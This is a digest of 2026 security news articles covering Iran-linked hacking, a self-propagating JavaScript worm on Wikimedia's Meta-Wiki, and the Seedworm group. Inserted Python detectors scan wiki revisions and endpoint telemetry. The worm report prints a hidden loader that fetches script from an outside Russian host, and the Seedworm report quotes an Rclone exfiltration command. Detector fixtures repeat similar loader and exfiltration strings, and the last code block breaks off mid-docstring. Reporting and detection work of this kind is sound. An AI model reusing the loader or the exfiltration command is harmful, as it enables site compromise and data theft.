Iran-linked hackers have been hitting back against the U.S., Israel and surrounding Gulf nations since the U.S.-led military operation on Saturday, which resulted in the assassination of Iranian Supreme Leader Ayatollah Ali Khamenei. According to findings from Israeli cyber firm Check Point Software, two types of surveillance cameras popular across Israel, Qatar, Bahrain and other Middle Eastern nations were compromised by Iranian-linked hackers, likely to monitor missile-related damage to those nations.

Researchers from cybersecurity company Palo Alto Networks’ Unit42 have also tracked dozens of pro-Iran hacktivist groups launching cyberattacks since Feb. 28, largely targeting critical infrastructure. These groups have claimed responsibility for compromises to Israeli payment systems and the temporary shutdown of Kuwaiti government websites.

One of these groups, Handala, has ties to the Iranian Ministry of Intelligence and Security, and claimed responsibility this week for attacks on an Israeli oil and gas energy company and the shutdown of some Jordanian gas stations.

It’s difficult to verify whether this group actually carried out these attacks. Jordan’s cybersecurity agency confirmed earlier this week that it had thwarted an Iranian cyberattack on wheat silo management systems in the country.

Despite the IDF’s strikes against the IRGC’s cyber command centers, cyberattacks linked to outside actors sympathetic to Iran may continue relatively unscathed.

Lt. Gen. Charles Moore, former deputy commander of U.S. Cyber Command, which handles offensive U.S. cyber operations against adversaries, said Wednesday that the IDF strikes will likely have “a significant impact on the regime’s ability to continue to execute these types of operations.” Still, Moore said, “that doesn’t mean proxy forces or others that are ideologically aligned with the regime can’t still attempt to conduct operations against us or Israel.”

The Iranian government has often relied on proxy groups outside the country, including those based in Russia, to carry out cyberattacks or disinformation campaigns on its behalf. This makes it harder to trace efforts back to the Iranian regime and more difficult for impacted countries to respond to these types of decentralized attacks.

“Cyber is now embedded in modern conflict, and operational impact does not require all operators to be physically located in Tehran,” said Alexander Leslie, senior advisor on government affairs at cybersecurity company Recorded Future.

politico.com EN 2026 Israel warfare headquarters US-Israel-Iran-War
Wikipedia hit by self-propagating JavaScript worm that vandalized pages https://www.bleepingcomputer.com/news/security/wikipedia-hit-by-self-propagating-javascript-worm-that-vandalized-pages/
08/03/2026 11:57:19

bleepingcomputer.com
March 5, 2026
By Lawrence Abrams

The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began vandalizing pages and modifying user scripts across multiple wikis.
Update: Added Wikimedia Foundation's statement below and made a correction to denote it was only the Meta-Wiki that was vandalized.

The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began modifying user scripts and vandalizing Meta-Wiki pages.

Editors first reported the incident on Wikipedia's Village Pump (technical), where users noticed a large number of automated edits adding hidden scripts and vandalism to random pages.

Wikimedia engineers temporarily restricted editing across projects while they investigated the attack and began reverting changes.

The JavaScript worm
According to Wikimedia's Phabricator issue tracker, it appears the incident started after a malicious script hosted on Russian Wikipedia was executed, causing a global JavaScript script on Wikipedia to be modified with malicious code.

The malicious script was stored at User:Ololoshka562/test.js [Archive], first uploaded in March 2024 and allegedly associated with scripts used in previous attacks on wiki projects.

Based on edit histories reviewed by BleepingComputer, the script is believed to have been executed for the first time by a Wikimedia employee account earlier today while testing user-script functionality. It is not currently known whether the script was executed intentionally, accidentally loaded during testing, or triggered by a compromised account.

BleepingComputer's review of the archived test.js script shows it self-propagates by injecting malicious JavaScript loaders into both a logged-in user's common.js and Wikipedia's global MediaWiki:Common.js, which is used by everyone.

MediaWiki allows both global and user-specific JavaScript files, such as MediaWiki:Common.js and User:<username>/common.js, which are executed in editors’ browsers to customize the wiki interface.

After the initial test.js script was loaded in a logged-in editor's browser, it attempted to modify two scripts using that editor's session and privileges:

User-level persistence: it tried to overwrite User:<username>/common.js with a loader that would automatically load the test.js script whenever that user browses the wiki while logged in.
Site-wide persistence: If the user had the right privileges, it would also edit the global MediaWiki:Common.js script, so that it would run for every editor that uses the global script.

Code to inject a self-propagating JavaScript worm into the MediaWiki:Common.js script
Source: BleepingComputer
If the global script was successfully modified, anyone loading it would automatically execute the loader, which would then repeat the same steps, including infecting their own common.js, as shown below.

A Wikimedia user's infected common.js script
Source: BleepingComputer
The script also includes functionality to edit a random page by requesting one via the Special:Random wiki command, then editing the page to insert an image and the following hidden JavaScript loader.

[[File:Woodpecker10.jpg|5000px]]
<span style="display:none">
[[#%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E]]
</span>
According to BleepingComputer's analysis, approximately 3,996 pages were modified, and around 85 users had their common.js files replaced during the security incident. It is unknown how many pages were deleted.
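A revision scanner for the two injection patterns described above: a loader in a user's common.js or in MediaWiki:Common.js that executes a script fetched from another wiki, and a hidden span in ordinary wikitext carrying a percent-encoded script loader. This is an added example, not code from BleepingComputer or Wikimedia; the trusted-host set, the sample revisions and every hostname in them are constructed placeholders.

```python
"""Scan wiki revisions for the loader patterns the article describes.

Constructed example: the sample revisions, the trusted-host set and every
hostname below are placeholders, not data from the incident.
"""
import re
from urllib.parse import unquote, urlsplit

# Hosts a script page on the scanned wiki is expected to load code from.
# Assumption for the example: the scanned wiki is Meta-Wiki.
TRUSTED_HOSTS = {"meta.wikimedia.org"}

# Script-loading calls available in a MediaWiki page context.
LOAD_CALL = re.compile(
    r"(?:mw\.loader\.load|\$\.getScript|jQuery\.getScript|importScriptURI)"
    r"\s*\(\s*['\"]([^'\"]+)['\"]"
)
# A display:none span is where the worm parked its percent-encoded loader.
HIDDEN_SPAN = re.compile(r"<span[^>]*display\s*:\s*none[^>]*>(.*?)</span>", re.I | re.S)
SCRIPT_MARKER = re.compile(r"<script\b|\$\.getScript|mw\.loader\.load", re.I)


def _host_of(url: str) -> str:
    """Host of an absolute or protocol-relative URL; '' for a same-wiki path."""
    if url.startswith("//"):
        url = "https:" + url
    return (urlsplit(url).hostname or "").lower()


def scan_script_page(content: str) -> list:
    """Findings for a .js page: loads from untrusted hosts, and raw user-script loads."""
    findings = []
    for match in LOAD_CALL.finditer(content):
        url = match.group(1)
        host = _host_of(url)
        if host and host not in TRUSTED_HOSTS:
            findings.append(("external_script_load", host))
        elif re.search(r"title=User:[^&]+\.js", url) and "action=raw" in url:
            # Same wiki, but executing another user's script verbatim: worth review.
            findings.append(("raw_user_script_load", url))
    return findings


def scan_wikitext_page(content: str) -> list:
    """Findings for an ordinary page: script loaders hidden in display:none spans."""
    findings = []
    for match in HIDDEN_SPAN.finditer(content):
        decoded = unquote(match.group(1))
        if SCRIPT_MARKER.search(decoded):
            findings.append(("hidden_script_loader", decoded.strip()))
    if not findings and re.search(r"%3Cscript%3E", content, re.I):
        # A percent-encoded <script> tag outside a hidden span is still not normal wikitext.
        findings.append(("encoded_script_tag", content))
    return findings


def scan_revisions(revisions: list) -> dict:
    """Map page title -> findings for each revision that shows an injection pattern."""
    report = {}
    for rev in revisions:
        title, content = rev["title"], rev["content"]
        found = scan_script_page(content) if title.endswith(".js") else scan_wikitext_page(content)
        if found:
            report[title] = found
    return report


SAMPLE_REVISIONS = [  # constructed, not real Wikimedia data
    # Ordinary same-wiki gadget load: must not be flagged.
    {"title": "User:Alice/common.js",
     "content": "mw.loader.load('/w/index.php?title=MediaWiki:Gadget-HotCat.js"
                "&action=raw&ctype=text/javascript');"},
    # User-level persistence: loader pulling a user test script from another wiki.
    {"title": "User:Bob/common.js",
     "content": "mw.loader.load('//other-wiki.example.invalid/w/index.php?"
                "title=User:Example/test.js&action=raw&ctype=text/javascript');"},
    # Site-wide persistence: the same loader appended to the global script.
    {"title": "MediaWiki:Common.js",
     "content": "/* gadget code */\n$.getScript('//other-wiki.example.invalid/w/"
                "index.php?title=User:Example/test.js&action=raw&ctype=text/javascript');"},
    # Vandalised page: oversized image plus a hidden percent-encoded loader.
    {"title": "Meta:Sandbox",
     "content": "Some text.\n[[File:Example.jpg|5000px]]\n<span style=\"display:none\">\n"
                "[[#%3Cscript%3E$.getScript('//cdn.example.invalid/s/x')%3C/script%3E]]\n</span>"},
    # Untouched page with a harmless hidden span.
    {"title": "Meta:Help",
     "content": "Plain wikitext, a [[link]] and <span style=\"display:none\">nothing</span>."},
]

if __name__ == "__main__":
    for title, findings in scan_revisions(SAMPLE_REVISIONS).items():
        for kind, detail in findings:
            print(f"{title}: {kind} -> {detail[:60]}")
```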

Pages modified by JavaScript worm
Source: BleepingComputer
As the worm spread, engineers temporarily restricted editing across projects while reverting the malicious changes and removing references to the injected scripts.

During the cleanup, Wikimedia Foundation staff members also rolled back the common.js for numerous users across the platform. These modified pages have now been "suppressed" and are no longer visible in the change histories.

At the time of writing, the injected code has been removed, and editing is once again possible.

However, Wikimedia has not yet published a detailed post-incident report explaining exactly how the dormant script was executed or how widely the worm propagated before it was contained.

Update 3/5/26 7:45 PM ET: The Wikimedia Foundation shared the following statement with BleepingComputer, stating that the code was active for only 23 minutes, during which it only changed and deleted content on Meta-Wiki, which has since been restored.

"Earlier today, Wikimedia Foundation staff were conducting a security review of user-authored code on Wikipedia. During that review, we activated dormant code that was then quickly identified to be malicious. As a preventative measure, we temporarily disabled editing on Wikipedia and other Wikimedia projects while we removed the malicious code and confirmed the website was safe for user activity. The security issue behind this disruption has now been resolved.

The code was active for a 23 minute period. During that time, it changed and deleted content on Meta-Wiki – which is now being restored – but it did not cause permanent damage. We have no evidence that Wikipedia was under attack, or that personal information was breached as part of this incident. We are developing additional security measures to minimize the risk of this kind of incident happening again. Updates continue to be made available via the Foundation's public incident log."

bleepingcomputer.com EN 2026 JavaScript Security-Incident Wikimedia Wikipedia Worm
FBI targeted with ‘suspicious’ activity on its networks | CyberScoop https://cyberscoop.com/fbi-targeted-with-suspicious-activity-on-its-networks/
08/03/2026 11:55:07

cyberscoop.com
Written by Tim Starks

The FBI found evidence that its networks had been targeted in a suspected cybersecurity incident, the bureau confirmed on Thursday, without sharing any further details.

“The FBI identified and addressed suspicious activities on FBI networks, and we have leveraged all technical capabilities to respond,” the agency said in a statement. “We have nothing additional to provide.”

CNN and CBS reported that the suspicious activity targeted a digital system the FBI uses to manage and conduct surveillance, including work related to foreign surveillance warrants, wiretaps and pen registers, which are used to trace phone and computer data like IP addresses and dialed phone numbers.

News broke in 2024 that the Chinese hacking group Salt Typhoon had exploited the U.S. wiretapping system under the Communications Assistance for Law Enforcement Act that law enforcement and intelligence agencies rely upon, but CNN reported that it wasn’t clear if there was a connection between the 2024 and recent suspected incidents.

It also wasn’t clear when the incident occurred, or who was responsible.

The FBI, like virtually every federal agency, is no stranger to being targeted or infiltrated by hackers.

In 2023, the FBI said it had isolated and contained a cyber intrusion in its New York Field Office. In 2021, hackers exploited a misconfigured FBI server to send hoax emails, although the bureau said its own systems weren’t affected.

Congress, former agents and others have raised concerns about the FBI’s cyber capabilities amid budget cuts and the loss of personnel under the second Trump administration. Brett Leatherman, leader of the bureau’s cyber division, told CyberScoop recently that it has suffered no diminishment of its ability to respond to threats and incidents.


cyberscoop.com EN 2026 FBI US Malicious suspicious activity
Hacktivists claim to have hacked Homeland Security to release ICE contract data https://techcrunch.com/2026/03/02/hacktivists-claim-to-have-hacked-homeland-security-to-release-ice-contract-data/
08/03/2026 11:52:34

TechCrunch
techcrunch.com
Lorenzo Franceschi-Bicchierai
8:11 AM PST · March 2, 2026

A group of hacktivists calling themselves “Department of Peace” claimed to have hacked the Department of Homeland Security (DHS), leaking allegedly stolen documents online.

On Sunday, the nonprofit transparency collective DDoSecrets published data relating to contracts between DHS, Immigration and Customs Enforcement (ICE), and more than 6,000 companies, including defense contractors Anduril, L3Harris, Raytheon, and surveillance enabler Palantir, as well as tech giants Microsoft and Oracle.

The hacktivists said the data comes from the Office of Industry Partnership, a unit within DHS that procures technology from the private sector.

DHS and ICE did not immediately respond to a request for comment.

Department of Peace explained their motives in a document alongside the hack, citing the recent killings of two peaceful protesters, U.S. citizens Alex Pretti and Renée Good, earlier this year in Minneapolis by federal agents.

“Why hack the DHS? I can think of a couple Pretti Good reasons! I’m releasing this because the DHS is killing us and people deserve to know which companies support them and what they’re working on,” the hackers wrote.

Since the beginning of the Trump administration, DHS and federal immigration agents with ICE have undertaken a campaign of mass deportations, arresting people with largely no criminal records, and detaining them in overcrowded facilities where critics say they are held in inhumane conditions. The mass deportation campaign has been aided by several tech companies, with Palantir at the forefront.

Security researcher Micah Lee organized the leaked data on a dedicated website, making the information easily searchable.

The site shows the name of the contractors, the amount of money they were awarded, as well as contact information, such as full names, email addresses, and phone numbers.

The largest contracts by total money awarded included $70 million for Cyber Apex Solutions, a company that claims on its barebones website to be “focused on filling the security gaps of critical infrastructure” in the U.S.; and $59 million for Science Applications International Corporation (SAIC), which provides AI services for government agencies. Underwriters Laboratories was awarded $29 million to provide testing, certification, and market intelligence to customers.

Cyber Apex Solutions, SAIC, and Underwriters Laboratories did not immediately respond to a request for comment.

This story was updated to clarify that Palantir enables, not provides, surveillance for the government.

techcrunch.com EN 2026 hacked Hacktivists US ICE Department-of-Peace Homeland-Security
Seedworm: Iranian APT on Networks of U.S. Bank, Airport, Software Company https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us
08/03/2026 11:47:52

SECURITY.COM
5 Mar 2026

This activity began in early February and has continued in recent days. What organizations should expect next from Iran-aligned groups and the steps they should take to guard against cyberattacks.

Activity associated with Iranian APT group Seedworm has been spotted on the networks of multiple U.S. companies. The activity began in February 2026 and has continued in recent days.
A U.S. bank, airport, non-profit and the Israeli operations of a U.S. software company were among the targets.
We round up details of recent Iranian cyber threat activity and what defenders need to look out for.

The Iranian APT group Seedworm (aka MuddyWater, Temp Zagros, Static Kitten) has been active on the networks of multiple U.S. companies since the beginning of February 2026, with activity continuing in recent days following U.S. and Israeli military strikes on Iran that have sparked conflict in the region.

A U.S. bank, software company and airport, and non-governmental organizations in both the U.S. and Canada, have experienced suspicious activity on their networks in recent days and weeks. The software company is a supplier to the defense and aerospace industries among others, and has a presence in Israel, with the company’s Israel operation seeming to be the target in this activity.

A previously unknown backdoor, which we have named Dindoor, was found on the networks of the Israeli outpost of this software company, with the same backdoor seen on the networks of a U.S. bank and the Canadian non-profit organization. This backdoor leverages Deno, the secure runtime for JavaScript and TypeScript, to execute. This backdoor was signed with a certificate issued to “Amy Cherne”.

There was also an attempt to exfiltrate data from the software company using Rclone to a Wasabi cloud storage bucket. It’s not clear if this was successful.

rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[REMOVED]:/192.168.0.x

A different, Python backdoor called Fakeset was found on the networks of the U.S. airport and non-profit. It was signed by certificates issued to “Amy Cherne” and “Donald Gay”. The Donald Gay certificate has been used previously to sign malware linked to Seedworm. The backdoor was downloaded from two servers belonging to the Backblaze cloud storage company:

gitempire.s3.us-east-005.backblazeb2.com

elvenforest.s3.us-east-005.backblazeb2.com

The Donald Gay certificate was also used to sign a sample from the malware family we call Stagecomp and which downloads the Darkcomp backdoor. The Stagecomp and the Darkcomp malware have been linked to Seedworm by vendors including Google, Microsoft and Kaspersky. While this malware wasn’t seen on the targeted networks, the use of the same certificates suggests the same actor - namely Seedworm - was behind the activity on the networks of the U.S. companies.

While it’s not known if the operations of Seedworm are disrupted by the current conflict, already having a presence on U.S. and Israeli networks prior to the current hostilities beginning means the threat group is in a potentially dangerous position to launch attacks. While we have disrupted these breaches, other organizations could still be vulnerable to attack.

Seedworm is a long-standing Iranian threat group, which usually mounts classic espionage attacks for the purposes of spying and information gathering. The group has been active since 2017, and CISA has said that it is “a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).” Seedworm originally focused on victims in the Middle East but later broadened its scope to target telecommunications, defense, local government, and oil and natural gas organizations in Asia, Africa, Europe, and North America. The group develops its own custom malware as well as using dual-use and living off the land tools.
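A hunting pass over endpoint telemetry for the tradecraft described in the paragraphs above: an Rclone transfer to a cloud-storage remote, a script run under the Deno runtime from a user-writable path, a script runtime fetching from a Backblaze B2 bucket host, and binaries signed with the quoted "Amy Cherne" and "Donald Gay" certificates. This is an added example, not Security.com's detection logic; the event schema, the backup-parent allowlist, the bucket name and all sample events are constructed assumptions.

```python
"""Hunt constructed endpoint events for the Seedworm tradecraft the article lists.

Assumptions for the example: events are dicts with proc, cmdline, parent, signer
and dst fields; the allowlist and every path, bucket and host below are made up.
"""
import re
import shlex
from typing import Dict, List

# Signer names quoted in the article; anything they sign is treated as hostile.
WATCHLISTED_SIGNERS = {"amy cherne", "donald gay"}
# Backblaze B2 bucket hosts (the article names two such download servers).
STORAGE_HOST_SUFFIXES = (".backblazeb2.com",)
RCLONE_VERBS = {"copy", "copyto", "sync", "move", "moveto"}
# Parents from which an Rclone transfer is expected (assumed for the example).
BACKUP_PARENT_ALLOWLIST = {"backupsvc.exe"}
SCRIPT_RUNTIMES = {"python.exe", "pythonw.exe", "powershell.exe", "deno.exe", "cmd.exe"}
WRITABLE_MARKERS = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")
# An Rclone remote looks like "name:path"; two+ name chars skips C:\ drive paths.
REMOTE_ARG = re.compile(r"^([A-Za-z][A-Za-z0-9_-]+):")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the rule hits for one event (empty list when nothing matches)."""
    hits = []
    proc = _basename(event.get("proc", ""))
    parent = _basename(event.get("parent", ""))
    args = shlex.split(event.get("cmdline", ""), posix=False)
    signer = event.get("signer", "").strip()
    if signer.lower() in WATCHLISTED_SIGNERS:
        hits.append("watchlisted_signer:" + signer)
    # Rclone pushing data to a named cloud remote from an unexpected parent.
    if proc.startswith("rclone") and len(args) > 1 and args[1].lower() in RCLONE_VERBS:
        remotes = [m.group(1) for a in args[2:] for m in [REMOTE_ARG.match(a)] if m]
        if remotes and parent not in BACKUP_PARENT_ALLOWLIST:
            hits.append("rclone_cloud_transfer:" + ",".join(remotes))
    # Deno executing a script that lives in a user-writable directory.
    if proc in {"deno", "deno.exe"} and "run" in args[1:]:
        if any(marker in args[-1].lower() for marker in WRITABLE_MARKERS):
            hits.append("deno_script_from_writable_path:" + args[-1])
    # A script runtime, not a backup client, talking to a storage bucket host.
    dst = event.get("dst", "").lower()
    if proc in SCRIPT_RUNTIMES and dst.endswith(STORAGE_HOST_SUFFIXES):
        hits.append("storage_bucket_fetch_by_runtime:" + dst)
    return hits


def hunt(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map event id -> hits for every event that matched at least one rule."""
    report = {}
    for event in events:
        hits = evaluate(event)
        if hits:
            report[event["id"]] = hits
    return report


SAMPLE_EVENTS = [  # constructed telemetry, not data from the investigation
    # Scheduled backup: Rclone from the allowlisted service, should stay quiet.
    {"id": "ev1", "proc": r"C:\Program Files\Backup\rclone.exe",
     "cmdline": r"rclone.exe sync D:\backups gdrive:backups",
     "parent": r"C:\Program Files\Backup\backupsvc.exe",
     "signer": "Backup Vendor Ltd", "dst": "www.googleapis.com"},
    # Hands-on exfiltration attempt of the kind quoted in the article.
    {"id": "ev2", "proc": r"C:\Users\Public\rclone.exe",
     "cmdline": r"rclone copy C:\backups wasabi:exfil-bucket/host01",
     "parent": r"C:\Windows\System32\cmd.exe", "signer": "", "dst": ""},
    # Deno-hosted backdoor, signed with a watchlisted certificate.
    {"id": "ev3", "proc": r"C:\Users\Public\svc\deno.exe",
     "cmdline": r"deno.exe run -A C:\Users\Public\svc\update.js",
     "parent": r"C:\Windows\System32\wscript.exe", "signer": "Amy Cherne", "dst": ""},
    # Python stage pulling a payload from a B2 bucket host (bucket name made up).
    {"id": "ev4", "proc": r"C:\Python311\python.exe",
     "cmdline": r"python.exe C:\Users\Public\fs.py",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "signer": "Python Software Foundation",
     "dst": "example-bucket.s3.us-east-005.backblazeb2.com"},
    # Ordinary browser traffic.
    {"id": "ev5", "proc": r"C:\Program Files\Google\Chrome\chrome.exe",
     "cmdline": "chrome.exe --profile-directory=Default",
     "parent": r"C:\Windows\explorer.exe", "signer": "Google LLC", "dst": "www.example.com"},
]

if __name__ == "__main__":
    for event_id, hits in hunt(SAMPLE_EVENTS).items():
        print(event_id, hits)
```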

Context
On February 28, 2026, the U.S. and Israel launched a coordinated offensive military air operation targeting Iran, leading to the death of Iran’s Supreme Leader Ayatollah Ali Khamenei, who was apparently killed on March 1 when a U.S./Israeli airstrike hit his compound. Several other high-ranking Iranian officials, as well as multiple civilians, were also killed in strikes.

In retaliation, Iran launched drones and ballistic missiles at adversaries throughout the Gulf region, including targeting Israel and U.S. military and diplomatic outposts in multiple countries in the region.

Because of the heated tension in the region and ongoing attacks, it is likely that Iran and its allies will also initiate cyber operations to further target their adversaries. Both Israel and Iran have a history of carrying out destructive cyberattacks, including against each other. While internet access in Iran may be disrupted by current military operations, there are cyber operatives working for the regime who are based in other countries.

The UK’s National Cyber Security Centre released an alert following this recent activity, stating that “Iranian state and Iran-linked cyber actors almost certainly currently maintain at least some capability to conduct cyber activity” and warning about the potential threat posed by “Iran-linked hacktivists”. Check Point also reported recently that the Handala threat group (see below) has been using the Starlink satellite network to stay online even before this most recent activity began, with the group reportedly leveraging the technology since mid-January, when a nationwide Internet shutdown was announced by Iran’s government.

Examining the cyber activity typically carried out by threat actors associated with Iran and its allies may help us predict the kinds of cyber operations we may see being executed as this conflict continues.

Iranian threat actors have become increasingly proficient in recent years. Not only has their tooling and malware improved, but they’ve also demonstrated strong social engineering capabilities, including spear-phishing campaigns and “honeytrap” operations used to build relationships with targets of interest to gain access to accounts or sensitive information.

One of the hallmarks of Iran’s operations in cyberspace is that it periodically mounts destructive attacks against organizations in countries it deems hostile, which at the moment would obviously include the U.S. and Israel. That creates a risk for organizations in those countries because these attacks are about sending a message rather than stealing information, which means that any organization in the country targeted could be in the firing line.

Other recent activity
Doxing Israeli officials and regional energy sector participants
Handala is an Iranian-aligned hacktivist group that is also known to operate in support of Palestine. It has been active since at least 2024. The group is known for attacks targeting Israeli organizations and entities perceived to support Israel, using phishing, data theft, ransomware, extortion and destructive attacks, including custom wipers. The group operates a leaks site where victim names are posted alongside stolen data and messages from the group. The group was also reportedly active on multiple underground cybercrime forums including BreachForums, Ramp and Exploit during its early days, but has since become more active on Telegram channels and X (formerly Twitter).

In December 2025, the group claimed to have compromised the mobile devices of former Israeli Prime Minister Naftali Bennett and Benjamin Netanyahu's Chief of Staff, Tzachi Braverman. The group leaked material they said they had stolen from the phones, including the contact information of prominent Israeli officials, journalists and business people, photos and videos. However, analysis by researchers disputed some of these claims, saying that the attacks appeared to be limited to Telegram accounts, and did not achieve complete phone access.

In February 2026, Handala claimed to have breached one of Israel's largest healthcare networks. Meanwhile, in March 2026, the group said it had breached Sharjah National Oil Corporation and Israel Opportunity Energy, exfiltrating more than 1.3TB of sensitive data, including confidential financial data, oil contracts and project details. The group has also made claims about breaching Saudi Arabian energy company Saudi Aramco in a post on its leaks site. However, the documents shared appeared to consist of older files that were already in circulation previously. This raises the possibility that the claim may have been exaggerated or partially fabricated, potentially representing an influence or psychological operation intended to generate attention, panic or reputation damage. The group has also posted messages claiming that Israeli Prime Minister Benjamin Netanyahu will be their next target.

Spearphishing academics and NGOs for intelligence collection
In an October 2025 campaign, Seedworm carried out a sophisticated spear-phishing attack that used a compromised mailbox to distribute a custom backdoor known as Phoenix to international organizations across the Middle East and North Africa (MENA), targeting more than 100 government entities as part of an espionage campaign.

The attackers leveraged a malicious Office attachment that has technical overlap with previously reported Seedworm attacks to deliver Phoenix. The command & control (C&C) server also reportedly hosted the PDQ remote access tool, which was used for remote access and persistence, as well as a custom browser credential stealer. It is believed the motive behind these attacks was intelligence collection, as well as persistent access, for the purposes of longer-term espionage and exfiltration.

Elsewhere, in November 2025, Seedworm was also linked to attacks that targeted academics with expertise on the Middle East and other foreign policy experts. This activity took place between June and August 2025. Suspicious spear-phishing emails impersonated Suzanne Maloney – the vice president and director of the Foreign Policy program at the Brookings Institution and an expert on Iran – using a Gmail address and a misspelled version of her name, “Suzzane Maloney.” In the attacks, the actors started out with a benign email, which eventually led to a subsequent email containing a malicious link to a remote access tool payload. It is likely these attacks were carried out for espionage - more specifically, to gather intelligence that could be leveraged for strategic advantage.

These attacks had TTP overlaps with other Iranian-aligned groups (Smoke Sandstorm, Mint Sandstorm/Charming Kitten) but were subsequently attributed to Seedworm.

Other 2025 activity
Camera scanning for intelligence gathering
Marshtreader (Pink Sandstorm, Agrius, Agonizing Serpens) is a group that has been active since 2020 and is reportedly linked to Iran’s Ministry of Intelligence and Security (MOIS). It is known for its destructive operations against countries in the Middle East, specifically Israel, conducting attacks under multiple aliases and leveraging data leaks in order to control and shape narratives using wiper and fake ransomware malware.

In June 2025, it was reported that the group had been observed scanning for cameras vulnerable to CVE-2023-6895 and CVE-2017-7921 across Israel during the June 2025 conflict, using infrastructure associated with Iranian actors.

In previous conflicts, actors have been observed compromising cameras to gather intelligence to support bombing damage assessment (BDA) by providing near-real time visibility of impact from bombings and strikes. It is likely these attacks were conducted to gain similar visibility into sensitive locations to perform reconnaissance and potentially enable follow-on targeting of high value targets.

Additionally, in June 2025, a successful password-spraying attack conducted from NordVPN infrastructure against Israeli municipal government entities was reported. It was followed by spear-phishing attacks containing links to a ClickFix page designed to trick users into executing malicious PowerShell, ultimately delivering a remote access tool (RAT) that lets the attackers execute arbitrary commands. It is likely the motive behind these attacks was account compromise and espionage. It is not clear which actor was behind these attacks, but the focus on Israeli targets points to an Iranian actor as the most likely perpetrator.

DieNet DDoS attacks
DieNet is a pro-Palestinian hacktivist group that emerged on Telegram around March 2025 and announced its intention to target “outlaw sites and corrupt government platforms” using DDoS attacks.

Following the arrest of activist Mahmoud Khalil, its activities intensified, with the group claiming responsibility for multiple DDoS attacks against U.S. critical infrastructure, including energy, financial, healthcare, government, transit and communication systems.

In its attacks, the group leveraged high-volume DDoS attacks reportedly via DDoS-as-a-service infrastructure, including TCP RST, DNS amplification, TCP SYN floods and NTP amplification attacks, as well as website defacements and data breaches.

Based on reporting, its motives were likely political retaliation and service disruption.

What can we expect next?
Given Iran's history of attacks leveraging destructive wipers, distributed-denial-of-service (DDoS) and hack-and-leak attacks, the likely next steps for the nation’s cyber actors and supporters may be multiple campaigns combining high-visibility disruption for political signaling and lower-visibility access operations for strategic leverage.

Defenders should anticipate noisy activity such as DDoS attacks, defacements, and leak claims targeting government, transportation, energy and defense contractors to amplify psychological and economic pressure.

It is also likely that more capable state-aligned groups will continue credential harvesting operations, along with vulnerability exploitation and covert persistence against critical infrastructure to generate immediate impact, while also positioning themselves for potential future destructive, espionage or coercive operations.

DDoS and defacements
Given the increase in "hacktivist" activity, we predict a surge in DDoS and defacements for fast signaling and media impact, similar to what has been observed recently with Handala’s claims of targeting critical national infrastructure (CNI).

It is likely such attacks would target a range of sectors, including government portals, municipal sites, airports/ports, logistics providers, banks, telcos, media and symbolic brands.

Password spraying and mailbox compromises
Over the last year, multiple reports involving Iran-backed groups repeatedly highlighted credential attacks and mailbox compromises as a means of initial access and intelligence gathering.

Targets could include defense organizations, government, contractors and NGOs. Additionally, adjacent organizations that support base operations, including fuel, catering, logistics, and communications could also be targets of these attacks.

Leaks / intimidation operations / psyops
Hacktivists such as Handala repeatedly use leaks and claims to amplify fear and pressure even when access is only partial - this is key escalation behavior.

Potential targets of these kinds of attacks and claims would likely include healthcare, local government, airports/ports, transportation and education, as well as high-profile individuals tied to defense, politics and media.

Critical infrastructure and opportunistic attacks
Given the current escalations between the U.S. and Iran, it is likely that CNI is at high risk of attack, as well as organizations supporting these entities.

Organizations with exposed terminal operating systems, schedules and trucking/rail interfaces may be targeted, as well as passenger processing systems, baggage systems, and contractor networks. Additionally, given the high risk, other organizations that operate within sectors such as energy/fuel supply chains may be targets.

Destructive attacks
Iran has previously exhibited high capabilities in destructive potential, particularly during escalation windows.

Any attacks would likely be focused on energy and utilities, transportation and logistics, the financial sector, telecoms, healthcare, defense contractors and military suppliers.

How can defenders prepare?
Organizations should prepare by strengthening monitoring capabilities and ensuring resilience across their infrastructure where possible. Early indicators such as vulnerability scanning, credential attacks and reconnaissance activity often give defenders an opportunity to detect intrusion attempts early in the attack chain.

DDoS and defacement campaigns
Due to the likelihood of early retaliation and intensifying psyops, defenders should expect attempts to disrupt public-facing services and monitor any internet-facing infrastructure for the following:

Spikes in HTTP requests from large, distributed IP ranges
Repeated probing of admin portals
Exploit attempts targeting web frameworks and content management systems
Scanning activity against exposed API endpoints
To prepare, organizations should look at performing the following:

Deploy web application firewalls (WAF) with updated rule sets
Enable DDoS protection via CDN or upstream filtering services
Decommission any non-essential or unused publicly accessible services
Ensure all up-to-date patches for web applications/plugins are applied regularly
Ensure website backups exist for rapid restoration, if required
Monitor underground forums, Telegram channels and social media for claims involving your organization
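Two of the indicators above (request spikes from widely distributed sources and repeated probing of admin portals) can be checked with simple aggregation over web access logs. The following is an added example and not code from the original report; the log format (timestamp, source IP, path, status), the admin path list and the thresholds are assumptions chosen for the constructed sample:

```python
"""Flag request-rate spikes from widely distributed sources and repeated
admin-portal probing in web access logs.

Added example, not from the original report. The access-log format
(<ISO timestamp>,<source ip>,<path>,<status>), the admin path list and the
thresholds are assumptions chosen for the constructed sample data.
"""
from collections import defaultdict
from statistics import median

ADMIN_PATHS = ("/wp-login.php", "/admin", "/xmlrpc.php")  # assumed portal paths


def build_sample_log():
    """Constructed access log: five quiet minutes from two office addresses,
    one minute with 40 requests from 40 different /24 networks, then one
    source hammering the login portal."""
    lines = []
    for minute in range(5):
        for i in range(3):
            ip = "198.51.100.10" if i % 2 == 0 else "198.51.100.11"
            lines.append(f"2026-03-07T10:0{minute}:{10 + i:02d}Z,{ip},/,200")
    for i in range(40):
        lines.append(f"2026-03-07T10:05:{i:02d}Z,10.0.{i}.7,/,503")
    for i in range(12):
        lines.append(f"2026-03-07T10:07:{i * 4:02d}Z,192.0.2.44,/wp-login.php,401")
    return lines


def parse(lines):
    return [dict(zip(("ts", "ip", "path", "status"), line.split(","))) for line in lines]


def detect_request_spike(lines, factor=5, min_prefixes=10):
    """Minutes whose request count is >= factor x the median per-minute
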